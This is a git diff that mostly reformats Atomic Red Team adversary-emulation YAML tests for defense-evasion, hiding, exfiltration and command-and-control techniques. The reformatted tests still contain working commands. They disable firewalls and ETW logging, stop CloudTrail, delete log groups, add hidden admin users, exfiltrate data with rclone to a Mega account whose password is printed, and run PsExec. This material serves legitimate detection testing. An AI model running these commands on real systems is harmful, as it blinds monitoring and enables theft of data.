-ErrorAction Ignore + Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force -ErrorAction Ignore name: powershell elevation_required: true - name: Blackbit - Disable Windows Firewall using netsh firewall auto_generated_guid: 91f348e6-3760-4997-a93b-2ceee7f254ee description: | - An adversary tries to modify the windows firewall configuration using the deprecated netsh firewall command (command still works). + An adversary tries to modify the windows firewall configuration using the deprecated netsh firewall command (command still works). supported_platforms: - windows executor: @@ -339,4 +339,4 @@ atomic_tests: cleanup_command: | netsh firewall set opmode mode=enable >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml index 9e8c462b..181016f1 100644 --- a/atomics/T1562.006/T1562.006.yaml +++ b/atomics/T1562.006/T1562.006.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: audisp_config_file_name: description: The name of the audispd configuration file to be changed - type: String + type: string default: audispd.conf auditd_config_file_name: description: The name of the auditd configuration file to be changed - type: String + type: string default: auditd.conf libaudit_config_file_name: description: The name of the libaudit configuration file to be changed - type: String + type: string default: libaudit.conf executor: command: | @@ -46,15 +46,15 @@ atomic_tests: input_arguments: syslog_config_file_name: description: The name of the syslog configuration file to be changed - type: String + type: string default: syslog.conf rsyslog_config_file_name: description: The name of the rsyslog configuration file to be changed - type: String + type: string default: rsyslog.conf syslog_ng_config_file_name: description: The name of the syslog-ng configuration file to be changed - type: String + type: string default: syslog-ng.conf executor: command: | @@ -81,7 +81,7 @@ atomic_tests: elevation_required: true - name: Disable Powershell ETW Provider - Windows auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84 - description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions. + description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions. supported_platforms: - windows input_arguments: @@ -132,8 +132,8 @@ atomic_tests: - name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 description: | - An adversary can disable the ETW Provider of Windows Defender, - so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. + An adversary can disable the ETW Provider of Windows Defender, + so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. supported_platforms: - windows executor: @@ -146,14 +146,14 @@ atomic_tests: - name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02 description: | - An adversary can disable the ETW Provider of Windows Defender, - so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. + An adversary can disable the ETW Provider of Windows Defender, + so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. supported_platforms: - windows executor: command: | New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -PropertyType DWord -Value 0 -Force cleanup_command: | - Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore + Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index d4031a14..61fe2ac4 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml @@ -10,33 +10,33 @@ atomic_tests: input_arguments: cloudtrail_name: description: Name of the cloudTrail - type: String + type: string default: "redatomictesttrail" s3_bucket_name: description: Name of the bucket - type: String + type: string default: "redatomic-test" region: description: Name of the region - type: String + type: string default: "us-east-1" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} - aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} + aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | - aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} - aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} - aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} - aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} + aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} + aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} + aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} + aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} cleanup_command: | - aws s3 rb s3://#{s3_bucket_name} --force + aws s3 rb s3://#{s3_bucket_name} --force name: sh elevation_required: false - name: Azure - Eventhub Deletion @@ -51,24 +51,24 @@ atomic_tests: input_arguments: username: description: Azure username - type: String - default: null + type: string + default: password: description: Azure password - type: String - default: null + type: string + default: event_hub_name: description: Name of the eventhub - type: String + type: string default: "test_eventhub" resource_group: description: Name of the resource group - type: String - default: null + type: string + default: name_space_name: description: Name of the NameSpace - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | @@ -97,12 +97,12 @@ atomic_tests: input_arguments: username: description: office-365 username - type: String - default: null + type: string + default: password: description: office-365 password - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | @@ -137,11 +137,11 @@ atomic_tests: input_arguments: stratus_path: description: Path of stratus binary - type: Path + type: path default: $PathToAtomicsFolder/T1562.008/src aws_region: description: AWS region to detonate - type: String + type: string default: us-west-2 dependency_executor_name: sh dependencies: @@ -159,11 +159,11 @@ atomic_tests: tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ fi - description: | - Check if ~/.aws/credentials file has a default stanza is configured + Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | - cat ~/.aws/credentials | grep "default" + cat ~/.aws/credentials | grep "default" get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | @@ -191,11 +191,11 @@ atomic_tests: input_arguments: stratus_path: description: Path of stratus binary - type: Path + type: path default: $PathToAtomicsFolder/T1562.008/src aws_region: description: AWS region to detonate - type: String + type: string default: us-west-2 dependency_executor_name: sh dependencies: @@ -213,11 +213,11 @@ atomic_tests: tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ fi - description: | - Check if ~/.aws/credentials file has a default stanza is configured + Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | - cat ~/.aws/credentials | grep "default" + cat ~/.aws/credentials | grep "default" get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | @@ -245,11 +245,11 @@ atomic_tests: input_arguments: stratus_path: description: Path of stratus binary - type: Path + type: path default: $PathToAtomicsFolder/T1562.008/src aws_region: description: AWS region to detonate - type: String + type: string default: us-west-2 dependency_executor_name: sh dependencies: @@ -267,11 +267,11 @@ atomic_tests: tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/ fi - description: | - Check if ~/.aws/credentials file has a default stanza is configured + Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | - cat ~/.aws/credentials | grep "default" + cat ~/.aws/credentials | grep "default" get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | @@ -288,7 +288,7 @@ atomic_tests: ./stratus cleanup --all rm -rf stratus* name: sh - elevation_required: false + elevation_required: false - name: AWS - CloudWatch Log Group Deletes auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121 description: | @@ -299,26 +299,26 @@ atomic_tests: input_arguments: cloudwatch_log_group_name: description: Name of the cloudWatch log group - type: String + type: string default: "log-test" region: description: Name of the region - type: String + type: string default: "us-east-1" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Created ***" - aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Deleted ***" - cleanup_command: + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: name: sh elevation_required: false - name: AWS - CloudWatch Log Stream Deletes @@ -331,26 +331,26 @@ atomic_tests: input_arguments: cloudwatch_log_group_name: description: Name of the cloudWatch log group - type: String + type: string default: "log-test" region: description: Name of the region - type: String + type: string default: "us-east-1" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Created ***" - aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Deleted ***" - cleanup_command: + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: name: sh elevation_required: false - name: AWS CloudWatch Log Stream Deletes @@ -363,33 +363,33 @@ atomic_tests: input_arguments: cloudwatch_log_group_name: description: Name of the cloudWatch log group - type: String + type: string default: "test-logs" cloudwatch_log_stream_name: description: Name of the cloudWatch log stream - type: String + type: string default: "20150601" region: description: Name of the region - type: String + type: string default: "us-west-2" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - get_prereq_command: | - echo Please install the aws-cli and configure your AWS defult profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Created ***" - aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} - echo "*** Log Stream Created ***" - aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} - echo "*** Log Stream Deleted ***" - aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - echo "*** Log Group Deleted ***" - cleanup_command: + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Created ***" + aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Deleted ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: name: sh - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1563.002/T1563.002.yaml b/atomics/T1563.002/T1563.002.yaml index e3dd363a..67687c6e 100644 --- a/atomics/T1563.002/T1563.002.yaml +++ b/atomics/T1563.002/T1563.002.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: Session_ID: description: The ID of the session to which you want to connect - type: String + type: string default: "1337" Destination_ID: description: Connect the session of another user to a different session - type: String + type: string default: rdp-tcp#55 executor: command: | diff --git a/atomics/T1564.001/T1564.001.yaml b/atomics/T1564.001/T1564.001.yaml index 2abeae0e..e731f985 100644 --- a/atomics/T1564.001/T1564.001.yaml +++ b/atomics/T1564.001/T1564.001.yaml @@ -35,7 +35,7 @@ atomic_tests: input_arguments: file_to_modify: description: File to modify using Attrib command - type: String + type: string default: '%temp%\T1564.001.txt' dependency_executor_name: command_prompt dependencies: @@ -62,7 +62,7 @@ atomic_tests: input_arguments: file_to_modify: description: File to modify using Attrib command - type: String + type: string default: '%temp%\T1564.001.txt' dependency_executor_name: command_prompt dependencies: @@ -88,7 +88,7 @@ atomic_tests: input_arguments: filename: description: path of file to hide - type: Path + type: path default: /tmp/evil executor: command: | diff --git a/atomics/T1564.002/T1564.002.yaml b/atomics/T1564.002/T1564.002.yaml index e67321cf..f2ad2ce1 100644 --- a/atomics/T1564.002/T1564.002.yaml +++ b/atomics/T1564.002/T1564.002.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: user_name: description: username to add - type: String + type: string default: APT executor: command: | @@ -28,7 +28,7 @@ atomic_tests: input_arguments: user_name: description: username to add - type: String + type: string default: APT executor: command: | @@ -47,11 +47,11 @@ atomic_tests: input_arguments: user_password: description: Password for new user account - type: String + type: string default: At0micRedTeam! user_name: description: Username - type: String + type: string default: AtomicOperator executor: command: | @@ -61,4 +61,4 @@ atomic_tests: reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v #{user_name}$ /f >nul 2>&1 net user ${user_name}$ /delete >nul 2>&1 name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1564.003/T1564.003.yaml b/atomics/T1564.003/T1564.003.yaml index ee9742f2..da0c1d4d 100644 --- a/atomics/T1564.003/T1564.003.yaml +++ b/atomics/T1564.003/T1564.003.yaml @@ -11,9 +11,9 @@ atomic_tests: input_arguments: powershell_command: description: Command to launch calc.exe from a hidden PowerShell Window - type: String + type: string default: powershell.exe -WindowStyle hidden calc.exe executor: command: | Start-Process #{powershell_command} - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1564.004/T1564.004.yaml b/atomics/T1564.004/T1564.004.yaml index d615f3e6..4cc3a8ae 100644 --- a/atomics/T1564.004/T1564.004.yaml +++ b/atomics/T1564.004/T1564.004.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: path: description: Path of ADS file - type: Path + type: path default: c:\ADS\ executor: command: | @@ -40,15 +40,15 @@ atomic_tests: input_arguments: payload_path: description: Path of file to hide in ADS - type: Path + type: path default: c:\windows\system32\cmd.exe ads_file_path: description: Path of file to create an ADS under - type: Path + type: path default: C:\Users\Public\Libraries\yanki\desktop.ini ads_name: description: Name of ADS - type: String + type: string default: desktop.ini executor: command: | @@ -70,11 +70,11 @@ atomic_tests: input_arguments: file_name: description: File name of file to create ADS on. - type: String + type: string default: '%temp%\T1564.004_has_ads_cmd.txt' ads_filename: description: Name of ADS. - type: String + type: string default: adstest.txt executor: command: | @@ -93,11 +93,11 @@ atomic_tests: input_arguments: file_name: description: File name of file to create ADS on. - type: String + type: string default: $env:TEMP\T1564.004_has_ads_powershell.txt ads_filename: description: Name of ADS file. - type: String + type: string default: adstest.txt dependency_executor_name: powershell dependencies: diff --git a/atomics/T1564.006/T1564.006.yaml b/atomics/T1564.006/T1564.006.yaml index 68efb6c7..137b07f8 100644 --- a/atomics/T1564.006/T1564.006.yaml +++ b/atomics/T1564.006/T1564.006.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: msi_file_path: description: Path to the MSI file - type: Path + type: path default: PathToAtomicsFolder\T1564.006\bin\Virtualbox_52.msi cab_file_path: description: Path to the CAB file - type: Path + type: path default: PathToAtomicsFolder\T1564.006\bin\common.cab dependency_executor_name: powershell dependencies: @@ -61,27 +61,27 @@ atomic_tests: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ https://attack.mitre.org/techniques/T1564/006/ supported_platforms: - - windows + - windows input_arguments: vm_name: description: Name of the new virtual machine - type: String + type: string default: Atomic VM virtualbox_exe: description: Path to the VirtualBox executable - type: Path + type: path default: C:\Program Files\Oracle\VirtualBox\VirtualBox.exe vboxmanage_exe: description: Path to the executable for VBoxManage, the command-line interface to VirtualBox - type: Path + type: path default: C:\Program Files\Oracle\VirtualBox\VBoxManage.exe virtualbox_download: description: URL for the current installer for the Windows version of VirtualBox, as of March 2022 - type: Url + type: url default: https://download.virtualbox.org/virtualbox/6.1.32/VirtualBox-6.1.32-149290-Win.exe virtualbox_installer: description: Executable for the Virtualbox installer - type: String + type: string default: VirtualBox-6.1.32-149290-Win.exe dependency_executor_name: powershell dependencies: @@ -120,20 +120,20 @@ atomic_tests: https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/ https://attack.mitre.org/techniques/T1564/006/ supported_platforms: - - windows + - windows input_arguments: vm_name: description: Name of the new virtual machine - type: String + type: string default: Atomic VM dependencies: - - description: | - Hyper-V must be enabled on the system - Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart - prereq_command: | - if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State = "Enabled") {exit 0} else {exit 1} - get_prereq_command: | - Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -Force + - description: | + Hyper-V must be enabled on the system + Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart + prereq_command: | + if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State = "Enabled") {exit 0} else {exit 1} + get_prereq_command: | + Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -Force executor: name: powershell elevation_required: true diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 9465e9b3..378b36f9 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml @@ -5,7 +5,7 @@ atomic_tests: auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a description: | This module extracts a binary (calc.exe) from inside of another binary. - + In the wild maldoc authors will use this technique to hide binaries inside of files stored within the office document itself. An example of this technique can be seen in sample @@ -41,22 +41,22 @@ atomic_tests: name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 - description: Creating a user with a username containing "$" + description: Creating a user with a username containing "$" supported_platforms: - windows executor: name: command_prompt - elevation_required: true + elevation_required: true command: net user $ ATOMIC123! /add /active:yes cleanup_command: net user $ /DELETE 2>&1 -- name: Create an "Administrator " user (with a space on the end) +- name: Create an "Administrator " user (with a space on the end) auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c description: Creating a user with a username containing with a space on the end supported_platforms: - windows executor: name: powershell - elevation_required: true + elevation_required: true command: New-LocalUser -Name "Administrator " -NoPassword cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null - name: Create and Hide a Service with sc.exe @@ -65,7 +65,7 @@ atomic_tests: The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query. Upon successful execution, sc.exe creates a new service changes the security descriptor. - + https://twitter.com/Alh4zr3d/status/1580925761996828672 https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format supported_platforms: @@ -73,11 +73,11 @@ atomic_tests: input_arguments: service_name: description: Name of service to create - type: String + type: string default: AtomicService executable_command: description: Command to execute as a service - type: String + type: string default: 'C:\Windows\System32\calc.exe' executor: command: | @@ -86,4 +86,4 @@ atomic_tests: cleanup_command: | sc.exe delete #{service_name} name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml index 454e4e78..8315c31e 100644 --- a/atomics/T1566.001/T1566.001.yaml +++ b/atomics/T1566.001/T1566.001.yaml @@ -28,11 +28,11 @@ atomic_tests: jse_path: description: | Path for the macro to write out the "malicious" .jse file - type: String + type: string default: C:\Users\Public\art.jse ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: diff --git a/atomics/T1567.002/T1567.002.yaml b/atomics/T1567.002/T1567.002.yaml index e57ca355..fc34da89 100644 --- a/atomics/T1567.002/T1567.002.yaml +++ b/atomics/T1567.002/T1567.002.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: rclone_path: description: Directory of rclone.exe - type: Path + type: path default: $env:temp\T1567.002\rclone-v*\ rclone_config_path: description: Path to rclone's config file (default should be fine) @@ -19,19 +19,19 @@ atomic_tests: default: $env:appdata dir_to_copy: description: Directory to copy - type: String + type: string default: $env:temp\T1567.002 mega_user_account: description: Mega user account - type: String + type: string default: atomictesting@outlook.com mega_user_password: description: Mega user password - type: String + type: string default: vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA remote_share: description: Remote Mega share - type: String + type: string default: T1567002 dependency_executor_name: powershell dependencies: @@ -44,19 +44,19 @@ atomic_tests: Expand-archive -path $env:temp\rclone.zip -destinationpath $env:temp\T1567.002\ -force executor: command: | - New-Item #{rclone_config_path}\rclone -ItemType directory - New-Item #{rclone_config_path}\rclone\rclone.conf - cd #{rclone_path} - .\rclone.exe config create #{remote_share} mega - set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}" - .\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v + New-Item #{rclone_config_path}\rclone -ItemType directory + New-Item #{rclone_config_path}\rclone\rclone.conf + cd #{rclone_path} + .\rclone.exe config create #{remote_share} mega + set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}" + .\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v cleanup_command: | - cd #{rclone_path} - .\rclone.exe purge #{remote_share}:test - .\rclone.exe config delete #{remote_share}: - Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue - cd c:\ - Remove-Item $env:temp\rclone.zip - Remove-Item $env:temp\T1567.002 -recurse -force + cd #{rclone_path} + .\rclone.exe purge #{remote_share}:test + .\rclone.exe config delete #{remote_share}: + Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue + cd c:\ + Remove-Item $env:temp\rclone.zip + Remove-Item $env:temp\T1567.002 -recurse -force name: powershell elevation_required: false diff --git a/atomics/T1569.001/T1569.001.yaml b/atomics/T1569.001/T1569.001.yaml index c214fbc9..11df555e 100644 --- a/atomics/T1569.001/T1569.001.yaml +++ b/atomics/T1569.001/T1569.001.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: executable_path: description: Path of the executable to run. - type: Path + type: path default: /System/Applications/Calculator.app/Contents/MacOS/Calculator label_name: description: Path of the executable to run. - type: String + type: string default: evil executor: command: | diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index fcaafe21..7e906f35 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml @@ -7,7 +7,7 @@ atomic_tests: Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt` - + [BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware) [Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware) supported_platforms: @@ -15,11 +15,11 @@ atomic_tests: input_arguments: service_name: description: Name of service to create - type: String + type: string default: ARTService executable_command: description: Command to execute as a service - type: String + type: string default: '%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt' executor: command: | @@ -42,19 +42,19 @@ atomic_tests: input_arguments: remote_host: description: Remote hostname or IP address - type: String + type: string default: localhost user_name: description: Username - type: String + type: string default: DOMAIN\Administrator password: description: Password - type: String + type: string default: P@ssw0rd1 psexec_exe: description: Path to PsExec - type: String + type: string default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: @@ -82,23 +82,23 @@ atomic_tests: input_arguments: remote_host: description: Remote hostname or IP address - type: String + type: string default: "127.0.0.1" username: description: Username - type: String + type: string default: "Administrator" domain: description: Target domain - type: String + type: string default: "" password: description: Password - type: String + type: string default: "P@ssw0rd1" command: description: Command to execute in target computer - type: String + type: string default: "whoami" dependency_executor_name: bash dependencies: diff --git a/atomics/T1571/T1571.yaml b/atomics/T1571/T1571.yaml index f0ad2640..d33dda52 100644 --- a/atomics/T1571/T1571.yaml +++ b/atomics/T1571/T1571.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: port: description: Specify uncommon port number - type: String + type: string default: "8081" domain: description: Specify target hostname - type: String + type: string default: google.com executor: command: | @@ -31,11 +31,11 @@ atomic_tests: input_arguments: port: description: Specify uncommon port number - type: String + type: string default: "8081" domain: description: Specify target hostname - type: String + type: string default: google.com executor: command: | diff --git a/atomics/T1572/T1572.yaml b/atomics/T1572/T1572.yaml index 51013eeb..d1d4f0fe 100644 --- a/atomics/T1572/T1572.yaml +++ b/atomics/T1572/T1572.yaml @@ -12,23 +12,23 @@ atomic_tests: input_arguments: doh_server: description: Default DoH resolver - type: String + type: string default: https://8.8.8.8/resolve query_type: description: DNS query type - type: String + type: string default: TXT subdomain: description: Subdomain prepended to the domain name - type: String + type: string default: atomicredteam query_volume: description: Number of DNS queries to send - type: Integer + type: integer default: "1000" domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io executor: command: | @@ -45,31 +45,31 @@ atomic_tests: input_arguments: doh_server: description: Default DoH resolver - type: String + type: string default: https://8.8.8.8/resolve runtime: description: Time in minutes to run the simulation - type: Integer + type: integer default: 30 domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io subdomain: description: Subdomain prepended to the domain name - type: String + type: string default: atomicredteam query_type: description: DNS query type - type: String + type: string default: TXT c2_interval: description: Seconds between C2 requests to the command and control server - type: Integer + type: integer default: 30 c2_jitter: description: Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests - type: Integer + type: integer default: 20 executor: command: | @@ -87,19 +87,19 @@ atomic_tests: input_arguments: doh_server: description: Default DoH resolver - type: String + type: string default: https://8.8.8.8/resolve query_type: description: DNS query type - type: String + type: string default: TXT subdomain: description: Subdomain prepended to the domain name (should be 63 characters to test maximum length) - type: String + type: string default: atomicredteamatomicredteamatomicredteamatomicredteamatomicredte domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io executor: command: | diff --git a/atomics/T1573/T1573.yaml b/atomics/T1573/T1573.yaml index 4c94b199..4432f158 100644 --- a/atomics/T1573/T1573.yaml +++ b/atomics/T1573/T1573.yaml @@ -15,11 +15,11 @@ atomic_tests: input_arguments: server_ip: description: IP of the external server - type: String + type: string default: 127.0.0.1 server_port: description: The port to connect to on the external server - type: String + type: string default: "443" executor: command: | diff --git a/atomics/T1574.002/T1574.002.yaml b/atomics/T1574.002/T1574.002.yaml index 0825dbf7..e2e3aae3 100644 --- a/atomics/T1574.002/T1574.002.yaml +++ b/atomics/T1574.002/T1574.002.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: process_name: description: Name of the created process - type: String + type: string default: calculator.exe gup_executable: description: GUP is an open source signed binary used by Notepad++ for software updates - type: Path + type: path default: PathToAtomicsFolder\T1574.002\bin\GUP.exe dependency_executor_name: powershell dependencies: @@ -42,11 +42,11 @@ atomic_tests: input_arguments: process_name: description: Name of the created process - type: String + type: string default: calculator.exe preloader_dll: description: library for interfacing with the dotnet framework - type: Path + type: path default: PathToAtomicsFolder\T1574.002\bin\preloader.dll dependency_executor_name: powershell dependencies: diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml index 53973f96..8bb78621 100644 --- a/atomics/T1574.006/T1574.006.yaml +++ b/atomics/T1574.006/T1574.006.yaml @@ -12,11 +12,11 @@ atomic_tests: input_arguments: path_to_shared_library_source: description: Path to a shared library source code - type: Path + type: path default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c path_to_shared_library: description: Path to a shared library object - type: Path + type: path default: /tmp/T1574006.so dependency_executor_name: bash dependencies: @@ -24,7 +24,7 @@ atomic_tests: The shared library must exist on disk at specified location (#{path_to_shared_library}) prereq_command: | 